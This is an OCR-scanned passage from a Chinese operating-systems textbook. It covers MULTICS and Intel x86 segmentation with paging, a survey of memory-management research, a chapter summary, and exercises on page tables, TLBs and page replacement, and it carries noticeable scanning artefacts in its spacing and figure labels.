fF) 和 分 段 的 优点 (易于 编程 、 模 块 化 、 
保护 和 共享 )。 

每 个 MULTICS 程 序 都 有 一 个 段 表 ， 
每 个 段 对 应 一 个 描述 符 。 因 为 段 表 可 能 
会 有 25 万 多 个 表 项 ， 段 表 本 身 也 是 一 个 
段 并 被 分 页 。 一 个 段 描述 符 包含 了 一 个 
段 是 否 在 内 存 中 的 标志 ， 只 要 一 个 段 的 
任何 一 部 分 在 内 存 中 这 个 段 就 被 认为 是 
在 内 存 中 , 并 且 它 的 页 表 也 会 在 内 存 中 。 
如 果 一 个 段 在 内 存 中 ， 它 的 描述 符 将 包 
含 一 个 18 位 的 指向 它 的 页 表 的 指针 ( 见 
图 3-34a) 。 因 为 物理 地 址 是 24 位 并 且 页 
面 是 按照 64 字 节 的 边界 对 齐 的 (这 隐 含 
着 页 面 地 址 的 低 6 位 是 000000) ， 所 以 在 
描述 符 中 只 需要 18 位 来 存储 页 表 地 址 。 
段 描述 符 中 还 包含 了 段 大 小 、 保 护 位 以 
及 其 他 的 一 些 条 目 。 图 3-34b 为 一 个 
MULTICS 段 描述 符 的 示例 。 段 在 辅助 





a) 


18 9 
BKE (LR 
页 表 的 主 存储 器 地 址 EIM 


TT1 3 3 


多 
A | 







页 面 大 小 : 
0= 1024 字 
1= 64 字 

0= 段 是 分 页 的 
1 = 段 是 不 分 页 的 


其 他 位 

保护 位 

b) 

图 3-34 MULTICS 的 虚拟 内 存 : a) 描述 符 段 指向 页 表 ; b) 一 个 
段 描述 符 ， 其 中 的 数字 是 各 个 域 的 长 度 
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存储 器 中 的 地 址 不 在 段 描述 符 中 ， 而 是 在 缺 段 处 理 程序 使 用 的 另 一 个 表 中 。 

每 个 自 都 是 一 个 普通 的 虚拟 地 址 空 a 
间 ， 采 用 本 章 前 面 讨论 过 的 非 分 段 式 分 页 ee 
1024 个 字 (尽管 有 一 些 MULTICS 自 己 使 7) 
用 的 段 不 分 页 或 以 64 个 字 为 单元 进行 分 页 站 


以 节省 物理 内 存 ) 。 
MULTICS 中 一 个 地 址 由 两 部 分 构成 ; sonnei 
段 和 段 内 地 址 。 段 内 地 址 又 进一步 分 为 页 
号 和 页 内 的 字 ， 如 图 3-35 所 示 。 在 进行 内 页 号 


存 访 问 时 ， 执 行 下 面 的 算法 。 

1) 根据 段 号 找到 段 描述 符 。 

2) 检查 该 段 的 页 表 是 否 在 内 存 中 。 如 
果 在 ， 则 找到 它 的 位 置 ， 如 果 不 在 ， 则 产 
生 一 个 段 错误 。 如 果 访 问 违反 了 段 的 保护 
要 求 就 发 出 一 个 越界 错误 (陷阱) 。 

3) 检查 所 请 求 虚拟 页 面 的 页 表 项 ， 如 





果 该 页 面 不 在 内 存 中 则 产生 一 个 缺 页 中 描述 符 段 页 号 页 表 页 面 

断 ， 如 果 在 内 存 就 从 页 表 项 中 取出 这 个 页 

面 在 内 存 中 的 起 始 地 址 。 图 3-36 两 部 分 组 成 的 MULTICS 地 址 到 内 存 地 址 的 转换 
4) 把 偏 移 量 加 到 页 面 的 起 始 地 址 上 ， 

得 到 要 访问 的 字 在 内 存 中 的 地 址 。 这 个 表 项 是 
5) 最 后 进行 读 或 写 操作 。 否 在 使 用 ? 


这 个 过 程 如 图 3-36 所 示 。 为 了 简单 起 
见 ， 忽 略 描述 符 段 自己 也 要 分 页 的 事实 。 
实际 的 过 程 是 通过 一 个 寄存 器 (描述 符 基 
址 寄存 器 ) 找到 描述 符 段 的 页 表 ， 这 个 页 
表 指 向 描述 符 段 的 页 面 。 一 旦 找到 了 所 需 
段 的 描述 符 ， 寻 址 过 程 就 如 图 3-36 所 示 。 

正如 读者 所 想 ， 如 果 对 于 每 条 指令 都 由 
操作 系统 来 运行 上 面 所 述 的 算法 ， 那 么 程序 
就 会 运行 得 很 慢 。 实 际 上 ，MULTICS 硬 件 
包含 了 16 个 字 的 高 速 TLB ， 对 给 定 的 关键 字 ”图 3-37 一 个 简化 的 MULTICS 的 TLB ， 两 个 页 面 大 小 的 存 
它 能 并 行 搜索 所 有 的 表 项 ， 如 图 3-37 所 示 。 在 使 得 实际 的 TLB 更 复杂 
当 一 个 地 址 被 送 到 计算 机 时 ， 寻 址 硬件 首先 
检查 虚拟 地 址 是 不 是 在 TLB 中 。 如 果 在 ， 就 直接 从 TLB 中 取得 页 框 号 并 生成 要 访问 的 字 的 实际 地 址 ， 而 不 
必 到 描述 符 段 或 页 表 中 去 查找 。 

TLB 中 保存 着 16 个 最 近 访 问 的 页 的 地 址 ， 工 作 集 小 于 TLB 容 量 的 程序 将 随 着 整个 工作 集 的 地 址 被 
装 和 人 TLB 中 而 逐渐 达到 稳定 ， 开 始 高 效 地 运行 ， 否 则 将 产生 TLB 错 误 。 


3.7.3 分 段 和 分 页 结合 : Intel x86 

x86 处 理 器 的 虚拟 内 存在 许多 方面 都 与 MULTICS 类 似 ， 其 中 包括 既 有 分 段 机 制 又 有 分 页 机 制 。 
MULTICS 有 256K 个 独立 的 段 ， 每 个 段 最 长 可 以 有 64K 个 36 位 字 。x86 处 理 器 有 16K 个 独立 的 段 ， 每 个 段 
最 多 可 以 容纳 10 亿 个 32 位 字 。 这 里 虽然 段 的 数目 较 少 ， 但 是 相 比 之 下 x86 较 大 的 段 大 小 特征 比 更 多 的 自 
个 数 要 重要 得 多 ， 因 为 几乎 没有 程序 需要 1000 个 以 上 的 段 ， 但 是 有 很 多 程序 需要 大 段 。 自 从 x86-64 起 ， 
除了 在 “传统 模式 ”下 ， 分 段 机 制 已 被 认为 是 过 时 的 且 不 再 被 支持 。 虽 然 在 x86-64 的 本 机 模式 下 仍然 有 
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分 段 机 制 的 某 些 痕迹 ， 但 大 多 只 是 为 了 兼容 ， 且 它们 不 再 具 起 到 同样 的 作用 ， 也 不 再 提供 真正 的 分 段 。 
但 是 X86-32 依 然 配备 了 所 有 的 处 理 机 制 ， 这 就 是 我 们 将 在 这 一 节 讨 论 的 CPU。 
x86 处 理 器 中 虚拟 内 存 的 核心 是 两 张 表 ， 即 LDT (Local Descriptor Table， 局 部 描述 符 表 ) 和 GDT 
(Global Descriptor Table， 全 局 描述 符 表 )。 每 个 程序 都 有 自己 的 LDT， 但 是 同一 台 计 算 机 上 的 所 有 程序 共享 一 
个 GDT。LDT 描 述 局 部 于 每 个 程序 的 段 ， 包 括 其 代码 、 数 据 、 堆 栈 等 ，GDT 描 述 系统 段 ， 包 括 操作 系统 本 身 。 
为 了 访问 一 个 段 ， 一 个 x86 程 序 必须 把 这 个 段 的 选择 子 (selector) 装 入 机 器 的 6 个 段 寄存 器 的 某 一 
个 中 。 在 运行 过 程 中 ，CS 寄 存 器 保存 代码 段 的 选 


位 
择 子 ，DS 寄 存 器 保存 数据 段 的 选择 子 ， 其 他 的 段 E 
寄存 器 不 太 重 要 。 每 个 选择 子 是 一 个 16 位 数 ， 如 


图 3-38 所 示 。 
选择 子 中 的 一 位 指出 这 个 段 是 局 部 的 还 是 全 人 
局 的 ( 即 它 是 在 LDT 中 还 是 在 GDT 中 )， 其 他 的 图 3-38 x86 处 理 器 中 的 选择 子 


13 位 是 LDT 或 GDT 的 表 项 编号 。 因 此 ， 这 些 表 
的 长 度 被 限制 在 最 多 容纳 8K 个 段 描 述 符 。 还 有 两 位 和 保护 有 关 ， 我 们 将 在 后 面 讨论 。 描 述 符 0 是 禁止 
使 用 的 ， 它 可 以 被 安全 地 装 入 一 个 段 寄存 器 中 用 来 表示 这 个 段 寄存 器 目前 不 可 用 ， 如 果 使 用 会 引起 一 次 
陷阱 。 

在 选择 子 被 装 入 段 寄 存 器 时 ， 对 应 的 描述 符 被 从 LDT 或 GDT 中 取出 装 入 微 程序 寄存 器 中 ， 以 便 快速 
地 访问 。 一 个 描述 符 由 8 个 字 节 构成 ， 包 括 段 的 基 址 、 大 小 和 其 他 信息 ， 如 图 3-39 所 示 。 











0: 16 位 段 0: 段 不 在 内 存 中 
1: 32 位 段 1: 段 在 内 存 中 
Limit 以 字 节 为 单位 ar 
0: Limit 以 字 : 系 
1: Limit 以 页 面 为 单位 I: aa 
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图 3-39 x86 处 理 器 代码 段 描述 符 (数据 段 略 有 不 同 ) 


.选择 子 的 格式 经 过 合理 设计 ， 使 得 根据 选择 子 定位 描述 符 十 分 方便 。 首 先 根据 第 2 位 选择 LDT 或 GDT， 
随后 选择 子 被 复制 进 一 个 内 部 擦 除 寄存 器 中 并 且 它 的 低 3 位 被 清 0， 最 后 ，LDT 或 GDT 表 的 地 址 被 加 到 它 上 
面 ,得 出 一 个 直接 指向 描述 符 的 指针 。 例 如 ， 选 择 子 72 指 向 GDT 的 第 9 个 表 项 ， 它 位 于 地 址 GDT +72, 

现在 跟踪 一 下 一 个 描述 地 址 的 (选择 子 ， 偏 移 量 ) 二 元 组 被 转换 为 物理 地 址 的 过 程 。 微 程序 知道 具 
体 要 使 用 哪个 段 寄存 器 后 ， 它 就 能 从 内 部 寄存 器 中 找到 对 应 于 这 个 选择 子 的 完整 的 描述 符 。 如 果 段 不 存 
在 (选择 子 为 0) 或 已 被 换 出 ， 则 会 发 生 一 次 陷阱 。 

硬件 随后 根据 Limit ( 段 长 度 ) 域 检查 偏 移 量 是 否 超出 了 段 的 结尾 ， 如 果 是 ， 也 发 生 一 次 陷阱 。 从 逻 
辑 上 来 说 ， 在 描述 符 中 应 该 简单 地 有 一 个 32 位 的 EEF 
域 给 出 段 的 大 小 ， 但 实际 上 剩余 20 位 可 以 使 用 ， 因 
此 采用 了 一 种 不 同 的 方案 。 如 果 G (粒度 ) 位 域 是 
0， 则 是 精确 到 字 节 的 段 长度 ， 最 大 1MB， 如 果 是 
1， 段 长 度 域 以 页 面 替代 字 节 作为 单元 给 出 段 的 大 
小 。 对 于 4KB 页 面 大 小 ，20 位 足够 最 大 2” 字 节 的 
段 使 用 。 

假设 段 在 内 存 中 并 且 偏 移 量 也 在 范围 内 ， [32 位 线性 地 址 | 
x86 处 理 器 接着 把 描述 符 中 32 位 的 基 址 和 偏 移 量 
相 加 形成 线性 地 址 (linear address)， 如 图 3-40 所 图 3-40 (HTF, mE) 对 转换 为 线性 地 址 
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示 。 为 了 和 只 有 24 位 基 址 的 286 兼 容 ， 基 址 被 分 为 3 片 分 布 在 描述 符 的 各 个 位 置 。 实 际 上 ， 基 址 允许 每 个 
段 的 起 始 地 址 位 于 32 位 线性 地 址 空间 内 的 任何 位 置 。 

如 果 禁 止 分 页 (通过 全 局 控制 寄存 器 中 的 一 位 ) ， 线 性 地 址 就 被 解释 为 物理 地 址 并 被 送 往 存储 器 用 
于 读 写 操作 。 因 此 在 禁止 分 页 时 ， 我 们 就 得 到 了 一 个 纯 的 分 段 方 案 。 各 个 段 的 基 址 在 它 的 描述 符 中 。 另 
外 ， 段 之 间 允 许 互 相 覆 盖 ， 这 可 能 是 因为 验证 所 有 的 段 都 互 不 重 登 太 麻 烦 太 费 时 间 的 缘故 。 

另 一 方面 ， 如 果 人 允许 分 页 ， 线 性 地 址 就 被 解释 为 虚拟 地 址 并 通过 页 表 映 射 到 物理 地 址 ， 很 像 前 面 讲 
过 的 例子 。 这 里 唯一 真正 复杂 的 是 在 32 位 虚拟 地 址 和 4KB 页 的 情况 下 ， 一 个 段 可 能 包含 多 达 100 万 个 页 
面 ， 因 此 使 用 了 两 级 映射 ， 以 便 在 段 较 小 时 减 小 页 表 大 小 。 

每 个 运行 程序 都 有 一 个 由 1024 个 32 位 表 项 组 成 的 页 目录 (page directory)。 它 通过 一 个 全 局 寄存 器 
来 定位 。 这 个 目录 中 的 每 个 目录 项 都 指向 一 个 也 包含 1024 个 32 位 表 项 的 页 表 ， 页 表 项 指向 页 框 ， 这 个 方 
案 如 图 3-41 所 示 。 


线性 地 址 
位 10 10 12 
a) 
页 目录 页 表 页 框 





目录 项 指向 页 表 页 表 表 项 指 
向 字 
b) 


图 3-41 线性 地 址 到 物理 地 址 的 映射 


在 图 3-41a 中 可 以 看 到 线性 地 址 被 分 为 三 个 域 : 目录 、 页 面 和 偏 移 量 。 目 录 域 被 作为 索引 在 页 目录 
中 找到 指向 正确 的 页 表 的 指针 ， 随 后 页 面 域 被 用 作 索 引 在 页 表 中 找到 页 框 的 物理 地 址 ， 最 后 ， 偏 移 量 被 
加 到 页 框 的 地 址 上 得 到 需要 的 字 节 或 字 的 物理 地 址 。 

每 个 页 表 项 是 32 位 ， 其 中 20 位 是 页 框 号 。 其 余 的 位 包含 了 由 硬件 设置 供 操作 系统 使 用 的 访问 位 和 脏 
位 、 保 护 位 和 一 些 其 他 有 用 的 位 。 

每 个 页 表 有 描述 1024 个 4KB 页 框 的 表 项 ， 因 此 一 个 页 表 可 以 处 理 4MB 的 内 存 。 一 个 小 于 4MB 的 段 的 
页 目录 中 将 只 有 一 个 表 项 ， 这 个 表 项 指向 一 个 唯一 的 页 表 。 通 过 这 种 方法 ， 长 度 短 的 段 的 开销 只 是 两 个 
页 面 ， 而 不 是 一 级 页 表 时 的 100 万 个 页 面 。 

为 了 避免 重复 的 内 存 访 问 ，x86 处 理 器 和 MULTICS 一 样 ， 也 有 一 个 小 的 TLB 把 最 近 使 用 过 的 “ 目 
录 一 页 面 ” 二 元 组 映射 为 页 框 的 物理 地 址 。 只 有 在 当前 组 合 不 在 TLB 中 时 ， 图 3-41 所 示 的 机 制 才 被 真正 
执行 并 更 新 TLB。 只 要 TLB 的 缺失 率 很 低 ， 则 性 能 就 不 错 。 

还 有 一 点 值得 注意 ， 如 果 某 些 应 用 程序 不 需要 分 段 ， 而 是 需要 一 个 单独 的 、 分 页 的 32 位 地 址 空间 ， 
这 样 的 模式 是 可 以 做 到 的 。 这 时 ， 所 有 的 段 寄 存 器 可 以 用 同一 个 选择 子 设置 ， 其 描述 符 中 基 址 设 为 0， 
段 长 度 被 设置 为 最 大 。 指 令 偏 移 量 会 是 线性 地 址 ， 只 使 用 了 一 个 地 址 空间 一 一 效果 上 就 是 正常 的 分 页 。 
事实 上 ， 所 有 当前 的 x86 操 作 系 统 都 是 这 样 工作 的 。OS/2 是 唯一 一 个 使 用 Intel MMU 体 系 结构 所 有 功能 
的 操作 系统 。 

BA, 英特尔 为 什么 要 剔除 它 支持 了 近 30 年 ， 且 源 自 表现 良好 的 MULTICS 存 储 模型 的 变形 体 呢 ? 
也 许 最 主要 的 原因 是 UNIX 和 Windows 都 不 曾 使 用 过 该 模型 ， 即 使 它 通过 在 受 保护 的 操作 系统 段 内 进行 
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针对 相关 地 址 的 过 程 调 用 而 消除 了 系统 调用 ， 并 具有 很 高 的 效率 。 没 有 哪个 UNIX 或 Windows 系 统 的 开 
发 人 员 愿 意 将 已 有 的 存储 模型 转变 为 针对 x86 使 用 的 模型 ， 因 为 这 会 破坏 系统 的 可 移植 性 。 由 于 软件 层 
并 没有 使 用 相关 的 功能 ， 导 致 英特尔 不 愿 再 以 牺牲 芯片 面积 为 代价 来 支持 它 ， 并 最 终 从 64 位 CPU 中 剔除 
TEs 

不 管 怎么 说 ， 我 们 不 得 不 称赞 x86 处 理 器 的 设计 者 ， 因 为 他 们 面 对 的 是 互相 冲突 的 目标 ， 实 现 纯 的 
分 页 、 纯 的 分 段 和 段 页 式 管理 ， 同 时 还 要 与 286 兼 容 ， 而 他 们 高 效 地 实现 了 所 有 的 目标 ， 最 终 的 设计 非 
常 简洁 。 


3.8 有 关内 存 管理 的 研究 


传统 的 内 存 管 理 (尤其 是 单 处 理 器 CPU 的 页 面 算 法 ) 研究 硕果 累累 ， 时 至 今日 ， 仍 有 人 坚守 阵地 继 
续 研究 (Moruz A, 2012), 或 者 在 此 基础 上 关注 某 些 特殊 需 求 的 应 用 (Stoica 和 Ailamaki, 2013), 
例如 在 线 事务 处 理 。 不 过 这 个 领域 的 研究 已 趋 式微 ， 大 多 数 都 已 消失 在 历史 长 河中 ， 至 少 对 于 通用 系统 
来 说 正 是 如 此 。 然 而 即使 针对 单 处 理 器 而 言 ，SSD 而 非 硬盘 的 页 面 处 理 也 带 来 了 新 的 问题 ， 并 需要 新 的 
算法 (Chen 等 人 ，2012)。 作 为 后 起 之 秀 的 非 易 失 性 相 变 内 存 ， 由 于 性 能 (Lee 等 人 ，2013)、 延 迟 
(Saito 和 Oikawa，2012) ， 以 及 使 用 频率 过 高 容易 损坏 (Bheda 等 人 ，2011，2012) 等 特性 ， 其 页 面 处 
理 也 需要 重新 考虑 。 

对 页 面 处 理 的 研究 仍 在 继续 ， 不 过 更 普遍 的 是 聚焦 于 新 型 系统 。 例 如 ， 关 注 内 存 管理 中 具有 重启 功 
能 的 虚拟 机 (Bugnion 等 人 ，2012)。 在 同样 的 研究 领域 里 ，Jantz 等 人 (2013) 的 工作 可 以 让 应 用 程序 向 
系统 提供 决策 ， 以 指导 取 哪 个 物理 页 来 支持 虚拟 页 。 在 云 服务 器 稳定 性 对 页 面 处 理 的 影响 方面 ， 每 次 虚 
拟 机 可 以 使 用 的 物理 内 存 总 量 都 不 同 ， 这 也 需要 新 的 算法 (Peserico, 2013), 

多 核 操 作 系统 的 页 面 处 理 成 为 一 个 新 热门 研究 领域 (Boyd-Wickizer 等 人 ，2008; Baumann 等 人 ， 
2009) 。 其 中 一 个 研究 点 在 于 ， 多 核 系 统 的 缓存 更 多 ， 其 共享 方式 更 为 复杂 (Lopez-Oritiz 和 Salinger， 
2012)。 和 多 核 研 究 相 关 的 是 NUMA 系 统 的 页 面 处 理 ， 其 中 ， 不 同 的 内 存 片 的 访问 次 数 不 同 (Dashti 等 
A, 2013; Lankest A, 2012). 

另外 ， 手 机 和 平板 等 电子 设备 也 逐渐 转型 为 小 型 电脑 ， 也 会 进行 从 RAM 到 “磁盘 ”的 页 面 置换 ， 
不 过 手机 上 的 磁盘 是 闪存 ，Joo 等 人 (2012) 最 近 做 了 一 些 相 关 研 究 。 

最 后 ， 实 时 系统 的 内 存 管 理 研究 仍 在 继续 (Kato 等 人 ，2011 ) 。 


3.9 小 结 


本 章 主要 讲解 内 存 管理 。 我 们 看 到 在 最 简单 的 系统 中 是 根本 没有 任何 交换 或 分 页 的 。 一 旦 程序 装 入 
内 存 ， 它 将 持续 在 内 存 中 运行 ， 直 到 结束 。 一 些 操 作 系统 一 次 只 允许 一 个 进程 在 内 存 中 运行 ， 而 另 一 些 
操作 系统 支持 多 道 程序 设计 。 这 种 模型 在 小 型 或 嵌入 式 实时 系统 中 仍 有 用 武之 地 。 

接 下 来 是 交换 技术 。 通 过 交换 技术 ， 系 统 可 以 同时 运行 总 内 存 占 用 超过 实际 物理 内 存 大 小 的 多 个 进 
程 。 如 果 一 个 进程 没有 内 存 空间 可 用 ， 它 将 会 被 交换 到 磁盘 上 。 内 存 和 磁盘 上 的 空闲 空间 可 以 使 用 位 图 
或 空闲 区 链表 来 记录 。 

现代 计算 机 都 有 某 种 形式 的 虚拟 内 存 。 最 简单 的 情况 下 ， 每 一 个 进程 的 地 址 空间 被 划分 为 同等 大 小 
的 块 ， 称 为 页 面 ， 页 面 可 以 被 放 入 内 存 中 任何 可 用 的 页 框 内 。 有 多 种 页 面 置 换算 法 ， 其 中 两 个 比较 好 的 
算法 是 老化 算法 和 工作 集 时 钟 算法 。 

为 了 使 分 页 系统 工作 良好 ， 仅 选择 算法 是 不 够 的 ， 还 要 关注 诸多 问题 ， 例 如 工作 集 的 确定 、 内 存 分 
配 策略 以 及 所 需 页 面 大 小 等 。 

如 果 要 处 理 在 执行 过 程 中 大 小 有 变化 的 数据 结构 , 分 段 是 一 个 有 用 的 选择 , 它 还 能 简化 链接 和 共享 。 
不 仅 如 此 ， 分 段 还 有 利于 为 不 同 的 段 提供 不 同 的 保护 。 有 时 ， 可 以 把 分 段 和 分 页 结合 起 来 ， 以 提供 二 维 
的 虚拟 内 存 。MULTICS 系 统 以 及 32 位 Intel x86 即 是 如 此 ， 支 持 分 段 也 支持 分 页 。 不 过 ， 几 乎 没有 操作 系 
统 开发 者 会 仔细 考虑 分 段 (因为 他 们 更 青睐 其 他 的 内 存 模型 )， 这 导致 分 段 逐 渐 乏 人 问津 。 如 今 ， 即 使 
64 位 版 本 的 x86 也 不 支持 真正 的 分 段 。 
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. IBM 360 有 一 个 设计 ， 为 了 对 2KB 大 小 的 块 进行 


加 锁 ， 会 对 每 个 块 分 配 一 个 4bit 的 密 钥 ， 这 个 密 
钥 存在 PSW 中 ， 每 次 内 存 引 用 时 ，CPU 都 会 进 
行 密 钥 比较 。 但 该 设计 有 诸多 缺陷 ， 除 了 描述 
中 所 言 ， 请 另外 提出 至 少 两 条 缺点 。 


.在 图 3-3 中 基 址 寄存 器 和 限界 寄存 器 含有 相同 


的 值 16384， 这 是 巧合 还 是 它们 总 是 相等 ?如 
果 这 只 是 巧合 ， 为 什么 在 这 个 例子 里 它们 是 相 
等 的 ? 


.交换 系统 通过 “紧缩 ”来 消除 空 亲 区 。 假 设 有 


很 多 空 亲 区 和 数据 段 随机 分 布 ， 并 且 读 或 写 32 
位 长 的 字 需 要 4ns 的 时 间 ,“ 紧 缩 ”4GB 的 空间 
大 概 需要 多 长 时 间 ? 为 了 简单 起 见 ， 假 设 字 节 0 
在 空闲 区 中 ， 内 存 中 最 高 地 址 处 含有 有 效 数 据 。 


.在 一 个 交换 系统 中 ， 按 内 存 地 址 排列 的 空闲 区 


大 小 是 10MB 、4MB 20MB, 18MB, 7MB, 
9MB、12MB 和 15MB 。 对 于 连续 的 段 请 求 : 
(a) 12MB 

(b) 10MB 

(c) 9MB 

使 用 首次 适 配 算法 ， 将 找 出 哪个 空闲 区 ? 使 用 
最 佳 适 配 、 最 差 适 配 、 下 次 适 配 算法 呢 ? 


. 物理 地 址 和 虚拟 地 址 有 什么 区 别 ? 
.对 下 面 的 每 个 十 进 制 虚拟 地 址 ， 分 别 使 用 4KB 


页 面 和 8KB 页 面 计算 虚拟 页 号 和 偏 移 量 : 20000, 
32768，60000。 


.使 用 图 3-9 的 页 表 ， 给 出 下 面 每 个 虚拟 地 址 对 应 


的 物理 地 址 : 
(a) 20 

(b) 4100 

(c) 8300 


. Intel 8086 处 理 器 没有 MMU， 也 不 支持 虚拟 内 


存 ， 然 而 一 些 公司 曾经 出 售 过 这 种 系统 : 包含 
未 做 任何 改动 的 8086 CPU ， 支 持 分 页 。 猜 想 一 
下 ， 他 们 是 如 何 做 到 这 一 点 的 。( 提 示 : 考虑 
MMU 的 逻辑 位 置 。) 

为 了 让 分 页 虚拟 内 存 工作 ， 需 要 怎样 的 硬件 
支持 ? 


10. 写 时 复制 是 使 用 在 服务 器 系统 上 的 好 方法 ， 它 


能 否 在 手机 上 起 作用 ? 


11. 考虑 下 面 的 C 程 序 : 


int X[N]; 
intstep=M; //M 是 某 个 预定 义 的 常量 
for (int i = 0; i < N; i += step) X[i] = X[i] + 1; 


_ 
Ww 
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(a) 如 果 这 个 程序 运行 在 一 个 页 面 大 小 为 4KB 
且 有 64 个 TLB 表 项 的 机 器 上 ， 那 么 M 和 N 取 
什么 值 会 使 得 内 层 循环 的 每 次 执行 都 引起 
TLB 失 效 ? 

(b) 如 果 循 环 重复 很 多 遍 ， 结 果 会 和 a 的 答案 相 
同 吗 ? 请 解释 。 


. 可 用 于 存储 页 面 的 有 效 磁盘 空间 的 大 小 和 下 列 


因素 有 关 : 最 大 进程 数 *， 虚 拟 地 址 空间 的 字 
节 数 v"，RAM 的 字 节 数 r。 给 出 最 坏 情况 下 磁盘 
空间 需求 的 表达 式 。 这 个 数量 的 真实 性 如 何 ? 


. 如 果 一 条 指令 执行 1ns， 缺 页 中 断 执行 额外 的 


Nns， 且 每 k 条 指令 产生 一 个 缺 页， 请 给 出 一 个 
公式 ， 计 算 有 效 指令 时 间 。 


.一 个 机 器 有 32 位 地 址 空间 和 8KB 页 面 ， 页 表 全 


在 硬件 中 ， 页 表 的 每 一 表 项 为 一 个 32 位 字 。 进 
程 启动 时 ， 以 每 个 字 100ns 的 速度 将 页 表 从 内 
存 复制 到 硬件 中 。 如 果 每 个 进程 运行 100 ms 
(包含 装 和 人 页 表 的 时 间 ) ， 用 来 装 入 页 表 的 CPU 
时 间 的 比例 是 多 少 ? 


-假设 一 个 机 器 有 48 位 的 虚拟 地 址 和 32 位 的 物理 


地 址 。 

(a) 假设 页 面 大 小 是 4KB ， 如 果 只 有 一 级 页 表 ， 
那么 在 页 表 里 有 多 少 页 表 项 ? 请 解释 。 

(b) 假设 同一 系统 有 TLB， 该 TLB 有 32 个 表 项 。 
并 且 假 设 一 个 程序 的 指令 正好 能 放 入 一 个 
页 ， 其 功能 是 顺序 地 从 数组 中 读 取 长 整 型 
元 素 ， 该 数组 存在 上 千 个 不 同 的 页 中 。 在 
这 种 情况 下 TLB 的 效果 如 何 ? 


. 给 定 一 个 虚拟 内 存 系统 的 如 下 数据 : 


(a) TLB 有 1024 项 ， 可 以 在 1 个 时 钟 周期 (ns) 
内 访问 。 

(b) 页 表 项 可 以 在 100 时 钟 周 期 (100 ns) 内 访问 。 

(c) 平均 页 面 替换 时 间 是 6ms。 

如 果 TLB 处 理 的 页 面 访问 占 99%， 并 且 0.01% 

的 页 面 访问 会 发 生 缺 页 中 断 ， 那 么 有 效 地 址 转 

换 时 间 是 多 少 ? 


- 假设 一 个 机 器 有 38 位 的 虚拟 地 址 和 32 位 的 物理 


地 址 。 

(a) 与 一 级 页 表 比 较 ， 多 级 页 表 的 主要 优点 是 
什么 ? 

(b) 若 采 用 二 级 页 表 ， 页 面 大 小 为 16KB ， 每 个 
页 表 项 为 4 字 节 ， 应 该 对 第 一 级 页 表 域 分 配 
多 少 位 ? 对 第 二 级 页 表 域 分 配 多 少 位 ? 请 
解释 原因 。 
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在 3.3.4 节 的 陈述 中 ， 奔 腾 Pro 将 多 级 页 表 中 的 
每 个 页 表 项 扩展 到 64 位 ， 但 仍 只 能 对 4 GB 的 
内 存 进行 寻 址 。 请 解释 页 表 项 为 64 位 时 ， 为 何 
这 个 陈述 正确 。 


:一 个 32 位 地 址 的 计算 机 使 用 两 级 页 表 。 虚 拟 地 


址 被 分 成 9 位 的 第 一 级 页 表 域 、11 位 的 二 级 页 
表 域 和 一 个 偏 移 量 ， 页 面 大 小 是 多 少 ? 在 地 址 
空间 中 一 共有 多 少 个 页 面 ? 


.一 个 计算 机 使 用 32 位 的 虚拟 地 址 ，4KB 大 小 的 


页 面 。 程 序 和 数据 都 位 于 最 低 的 页 面 (0~4095 )， 
栈 位 于 最 高 的 页 面 。 如 果 使 用 传统 (一 级 ) 分 
页 ， 页 表 中 需要 多 少 个 表 项 ? 如 果 使 用 两 级 分 
页 ， 每 部 分 有 10 位 ， 需 要 多 少 个 页 表 项 ? 


.如 下 是 在 页 大 小 为 512 字 节 的 计算 机 上 ， 一 个 


程序 片段 的 执行 轨迹 。 这 个 程序 在 1020 地 址 ， 
其 栈 指针 在 8192 ( 栈 向 0 生长 )。 请 给 出 该 程序 
产生 的 页 面 访问 串 。 每 个 指令 (包括 立即 常数 
数 ) 占 4 个 字 节 (1 个 字 )。 指 令 和 数据 的 访问 
都 要 在 访问 串 中 计数 。 

将 字 6144 载 入 寄存 器 0 

寄存 器 0 压 栈 

调用 5120 处 的 程序 ， 将 返回 地 址 压 栈 

栈 指针 减 去 立即 数 16 

比较 实 参 和 立即 数 4 

如 果 相 等 ， 跳 转 到 5152 处 
一 台 计 算 机 的 进程 在 其 地 址 空间 有 1024 个 页 
面 ， 页 表 保 存在 内 存 中 。 从 页 表 中 读 取 一 个 字 
的 开销 是 Sns。 为 了 减 小 开销 ， 该 计算 机 使 用 
了 TLB， 它 有 32 个 〈 虚 拟 页 面 ， 物 理 页 框 ) 对 ， 
能 在 1ns 内 完成 查找 。 请 问 把 平均 开销 降 到 2ns 
需要 的 命中 率 是 多 少 ? 


.TLB 需 要 的 相 联 内 存 设备 如 何 用 硬件 实现 ? 这 


种 设计 对 扩展 性 意味 着 什么 ? 

一 台 机 器 有 48 位 虚拟 地 址 和 32 位 物理 地 址 ， 页 
面 大 小 是 8KB， 如 果 采 用 一 级 线性 页 表 ， 页 表 
中 需要 多 少 个 表 项 ? 

一 个 计算 机 的 页 面 大 小 为 8KB ， 主 存 大 小 为 
256KB, ，64GB 虚 拟 地 址 空间 使 用 倒 排 页 表 实 现 
虚拟 内 存 。 为 了 保证 平均 散 列 链 的 长 度 小 于 1， 
散 列表 应 该 多 大 ? 假设 散 列 表 的 大 小 为 2 的 寡 。 
一 个 学 生 在 编译 器 设计 课程 中 向 教授 提议 了 一 
个 项 目 : 编写 一 个 编译 器 ， 用 来 产生 页 面 访问 
列表 , 该 列表 可 以 用 于 实现 最 优 页 面 置换 算法 。 
试问 这 是 否 可 能 ?为 什么 ? 有 什么 方法 可 以 改 
进 运行 时 的 页 面 置 换 效率 ? 
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27. 假设 虚拟 页 码 索 引流 中 有 一 些 重复 的 页 索引 序 
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列 , 该 序列 之 后 有 时 会 是 一 个 随机 的 页 码 索 引 。 

例如 ， 序 列 0，1，…，511，431，0，1，…， 

511，332，0，1，…… 中 就 包含 了 0，1，…， 

511 的 重复 ， 以 及 跟随 在 它们 之 后 的 随机 页 码 

索引 431 和 332。 

(a) 在 工作 负载 比 该 序列 短 的 情况 下 ， 标 准 的 
页 面 置换 算法 (LRU, FIFO, Clock) 在 处 
理 换 页 时 为 什么 效果 不 好 ? 

(b) 如 果 一 个 程序 分 配 了 500 个 页 框 ， 请 描述 一 
个 效果 优 于 LRU、EFIFO 或 Clock 算 法 的 页 面 
置换 方法 。 


. 如 果 将 FIFO 页 面 置换 算法 用 到 4 个 页 框 和 8 个 


页 面 上 ， 若 初始 时 页 框 为 空 ， 访 问 序列 串 为 
0172327103， 请 问 会 发 生 多 少 次 缺 页 中 断 ? 如 
果 使 用 LRU 算 法 呢 ? 
